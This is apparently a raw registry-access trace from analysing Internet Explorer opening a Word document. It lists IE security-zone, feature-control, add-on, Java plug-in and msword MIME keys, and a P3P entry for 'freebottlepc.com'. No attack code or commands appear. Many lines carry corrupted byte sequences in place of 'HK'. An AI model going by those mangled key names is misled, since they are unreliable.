HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StatusBarWeb
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\StatusBarWeb
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable Browser Extensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoBandCustomize
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Passport\LowDAMap
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\LowRegistry
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Zoom
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\LowMic
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Layout
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBarLayout
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AlwaysShowMenus
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\AlwaysShowMenus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Segoe UI
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ADDON_MANAGEMENT
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{18df081c-e8ad-4283-a596-fa578c2ebdc3}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\AcroIEHelperShim.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\Time
HKEY_CLASSES_ROOT\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\InprocServer32
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\LoadTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{b4f3a835-0e21-4959-ba22-42b3008e02ff}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\URLREDIR.DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\Time
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\LoadTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{DBC80044-A445-435B-BC74-9C25C1C588A9}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{DBC80044-A445-435B-BC74-9C25C1C588A9}\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{DBC80044-A445-435B-BC74-9C25C1C588A9}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{dbc80044-a445-435b-bc74-9c25c1c588a9}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DBC80044-A445-435B-BC74-9C25C1C588A9}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\jp2ssv.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{DBC80044-A445-435B-BC74-9C25C1C588A9}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore\Time
HKEY_LOCAL_MACHINE\SOFTWARE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Plug-in
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Plug-in\10.0.0
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Plug-in\10.0.0\UseNewJavaPlugin
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Runtime Environment
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Runtime Environment\1.7.0
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\1.7.0\JavaHome
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32
\xef\xae\x80\xc3\x95EY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32\(Default)
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}\InprocServer32
\xef\xae\x80\xc3\x95EY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}\InprocServer32\(Default)
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}\InprocServer32
\xef\xae\x80\xc3\x95EY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}\InprocServer32\(Default)
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32
\xef\xae\x80\xc3\x95EY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}\InprocServer32
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}\InprocServer32
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore\LoadTime
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Suggested Sites
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Suggested Sites\Enabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Suggested Sites
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}\1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}\1.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}\1.0\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}\1.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\OpenDirectlyInApp
HKEY_CURRENT_USER\Software\Policies\Microsoft\Security
HKEY_CURRENT_USER\Software\Microsoft\Security
HKEY_CLASSES_ROOT\CLSID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{7b8a2d94-0ac9-11d1-896c-00c04fb6bfc4}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InsecureQI
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AllowConsecutiveSlashesInUrlPathComponent
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\OptimisticBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IEDDE_REGISTER_PROTOCOL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IEDDE_REGISTER_PROTOCOL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Safety\PrivacIE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Safety\PrivacIE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_READ_ZONE_STRINGS_FROM_REGISTRY
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_READ_ZONE_STRINGS_FROM_REGISTRY
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\MediaTypeClass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Accepted Documents
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ratings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings\Key
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\No3DBorder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\No3DBorder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\TabbedBrowsing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TravelLog
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\TravelLog
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\MenuUserExpanded
\xef\xae\x80\xc3\x95EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History\freebottlepc.com
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C80120}
\xef\xae\x80\xc3\x95EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PrivacyAdvanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\UserChoice
HKEY_CURRENT_USER\Software\Classes\.doc
HKEY_LOCAL_MACHINE\Software\Classes\.doc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.doc\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\TreatAs
HKEY_CLASSES_ROOT\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\iexplore.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1803
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Filter\application/msword
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\application/msword
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_SNIFFING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING\iexplore.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2100
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored
HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/msword
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_REPORT_CACHEFILE_KB925832
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_REPORT_CACHEFILE_KB925832
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\MIMEAssociations\application/msword\UserChoice
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/msword\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/msword\Extension
HKEY_CURRENT_USER\Software\Classes\Word.Document.8\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\CLSID\(Default)
HKEY_CLASSES_ROOT\CLSID\{00020906-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\.doc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.doc\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\LocalServer32
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\DocObject
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\DocObject\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SAFE_BINDTOOBJECT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\iexplore.exe
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020906-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\(Default)
